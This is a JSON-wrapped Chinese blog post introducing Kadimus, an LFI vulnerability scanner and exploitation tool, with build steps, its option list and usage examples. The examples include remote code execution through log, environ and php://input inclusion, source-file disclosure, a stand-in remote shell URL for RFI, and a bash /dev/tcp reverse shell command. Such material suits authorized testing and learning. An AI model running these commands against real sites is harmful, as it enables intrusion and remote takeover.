{"id":291780,"date":"2022-05-26T14:28:48","date_gmt":"2022-05-26T06:28:48","guid":{"rendered":"https:\/\/www.idc.net\/help\/291780\/"},"modified":"2022-05-26T14:28:48","modified_gmt":"2022-05-26T06:28:48","slug":"kadimus%ef%bc%9a%e6%9c%ac%e5%9c%b0%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%ef%bc%88lfi%ef%bc%89%e6%bc%8f%e6%b4%9e%e6%a3%80%e6%b5%8b%e5%b7%a5%e5%85%b7","status":"publish","type":"post","link":"https:\/\/idc.net\/help\/291780\/","title":{"rendered":"Kadimus\uff1a\u672c\u5730\u6587\u4ef6\u5305\u542b\uff08LFI\uff09\u6f0f\u6d1e\u68c0\u6d4b\u5de5\u5177"},"content":{"rendered":"<p>Kadimus\u662f\u4e00\u4e2a\u7528\u4e8e\u68c0\u6d4b\u7f51\u7ad9\u672c\u5730\u6587\u4ef6\u5305\u542b(LFI)\u6f0f\u6d1e\u7684\u5b89\u5168\u5de5\u5177\u3002<\/p>\n<p style=\"text-align: center\"><span>[[131145]]<\/span><\/p>\n<p><strong>\u7279\u6027<\/strong><\/p>\n<pre>\r\n\u68c0\u6d4b\u6240\u6709URL\u53c2\u6570\r\n\/var\/log\/auth.log RCE\r\n\/proc\/self\/environ RCE\r\nphp:\/\/input RCE\r\ndata:\/\/text RCE\r\n\u6e90\u4ee3\u7801\u6cc4\u9732\u68c0\u6d4b\r\n\u591a\u7ebf\u7a0b\u626b\u63cf\r\nHTTP\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\r\n\u4ee3\u7406\u652f\u6301 (socks4:\/\/, socks4a:\/\/, socks5:\/\/ ,socks5h:\/\/ and http:\/\/)<\/pre>\n<p><strong>\u7f16\u8bd1<\/strong><\/p>\n<p>\u5b89\u88c5libcurl:<\/p>\n<p>CentOS\/Fedora<\/p>\n<pre>\r\n# yum install libcurl-devel\r\nDebian based\r\n# apt-get install libcurl4-openssl-dev<\/pre>\n<p><strong>\u5b89\u88c5libpcre:<\/strong><\/p>\n<p>CentOS\/Fedora<\/p>\n<pre>\r\n# yum install libpcre-devel<\/pre>\n<p>&nbsp;<\/p>\n<p>Debian based<\/p>\n<pre>\r\n# apt-get install libpcre3-dev<\/pre>\n<p>&nbsp;<\/p>\n<p><strong>\u5b89\u88c5libssh:<\/strong><\/p>\n<p>CentOS\/Fedora<\/p>\n<pre>\r\n# yum install libssh-devel<\/pre>\n<p>&nbsp;<\/p>\n<p>\u57fa\u4e8eDebian<\/p>\n<pre>\r\n# apt-get install libssh-dev<\/pre>\n<p>&nbsp;<\/p>\n<p><strong>***\u6267\u884c<\/strong><\/p>\n<pre>\r\n$ git clone https:\/\/github.com\/P0cL4bs\/Kadimus.git\r\n$ cd Kadimus\r\n$ 
make<\/pre>\n<p>&nbsp;<\/p>\n<p><strong>\u9009\u9879<\/strong><\/p>\n<pre>\r\n-h, --help                    Display this help menu\r\n  Request:\r\n    -B, --cookie STRING         Set custom HTTP Cookie header\r\n    -A, --user-agent STRING     User-Agent to send to server\r\n    --connect-timeout SECONDS   Maximum time allowed for connection\r\n    --retry-times NUMBER        number of times to retry if connection fails\r\n    --proxy STRING              Proxy to connect, syntax: protocol:\/\/hostname:port\r\n  Scanner:\r\n    -u, --url STRING            Single URI to scan\r\n    -U, --url-list FILE         File contains URIs to scan\r\n    -o, --output FILE           File to save output results\r\n    --threads NUMBER            Number of threads (2..1000)\r\n  Explotation:\r\n    -t, --target STRING         Vulnerable Target to exploit\r\n    --inject-at STRING          Parameter name to inject exploit\r\n                                (only need with RCE data and source disclosure)\r\n  RCE:\r\n    -X, --rce-technique=TECH    LFI to RCE technique to use\r\n    -C, --code STRING           Custom PHP code to execute, with php brackets\r\n    -c, --cmd STRING            Execute system command on vulnerable target system\r\n    -s, --shell                 Simple command shell interface through HTTP Request\r\n    -r, --reverse-shell         Try spawn a reverse shell connection.\r\n    -l, --listen NUMBER         port to listen\r\n    -b, --bind-shell            Try connect to a bind-shell\r\n    -i, --connect-to STRING     Ip\/Hostname to connect\r\n    -p, --port NUMBER           Port number to connect\r\n    --ssh-port NUMBER           Set the SSH Port to try inject command (Default: 22)\r\n    --ssh-target STRING         Set the SSH Host\r\n    RCE Available techniques\r\n      environ                   Try run PHP Code using \/proc\/self\/environ\r\n      input                     Try run PHP Code using php:\/\/input\r\n      auth                      Try run 
PHP Code using \/var\/log\/auth.log\r\n      data                      Try run PHP Code using data:\/\/text\r\n    Source Disclosure:\r\n      -G, --get-source          Try get the source files using filter:\/\/\r\n      -f, --filename STRING     Set filename to grab source [REQUIRED]\r\n      -O FILE                   Set output file (Default: stdout)<\/pre>\n<p>&nbsp;<\/p>\n<p><strong>\u6d4b\u8bd5\u793a\u4f8b<\/strong><\/p>\n<p>\u626b\u63cf:<\/p>\n<pre>\r\n.\/kadimus -u localhost\/?pg=contact -A my_user_agent\r\n.\/kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0<\/pre>\n<p>&nbsp;<\/p>\n<p>\u83b7\u53d6\u6587\u4ef6\u6e90\u7801:<\/p>\n<pre>\r\n.\/kadimus -t localhost\/?pg=contact -G -f \"index.php\" -O local_output.php --inject-at pg<\/pre>\n<p>&nbsp;<\/p>\n<p>\u6267\u884cphp\u4ee3\u7801:<\/p>\n<pre>\r\n.\/kadimus -t localhost\/?pg=php:\/\/input -C '' -X input<\/pre>\n<p>&nbsp;<\/p>\n<p>\u547d\u4ee4\u6267\u884c:<\/p>\n<pre>\r\n.\/kadimus -t localhost\/?pg=\/var\/log\/auth.log -X auth -c 'ls -lah' --ssh-target localhost<\/pre>\n<p>&nbsp;<\/p>\n<p>\u68c0\u67e5\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b(RFI)\u6f0f\u6d1e:<\/p>\n<pre>\r\n\/* http:\/\/bad-url.com\/shell.txt *\/ <\/pre>\n<p>&nbsp;<\/p>\n<p>\u53cd\u5f39shell:<\/p>\n<pre>\r\n.\/kadimus -t localhost\/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i &gt;&amp; \/dev\/tcp\/127.0.0.1\/12345 0&gt;&amp;1' --retry-times 0<\/pre>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kadimus\u662f\u4e00\u4e2a\u7528\u4e8e\u68c0\u6d4b\u7f51\u7ad9\u672c\u5730\u6587\u4ef6\u5305\u542b(LFI)\u6f0f\u6d1e\u7684\u5b89\u5168\u5de5\u5177\u3002 [[131145]] \u7279\u6027 \u68c0\u6d4b\u6240\u6709U 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[202645],"tags":[],"class_list":["post-291780","post","type-post","status-publish","format-standard","hentry","category-202645"],"_links":{"self":[{"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/posts\/291780","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/comments?post=291780"}],"version-history":[{"count":0,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/posts\/291780\/revisions"}],"wp:attachment":[{"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/media?parent=291780"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/categories?post=291780"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/tags?post=291780"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}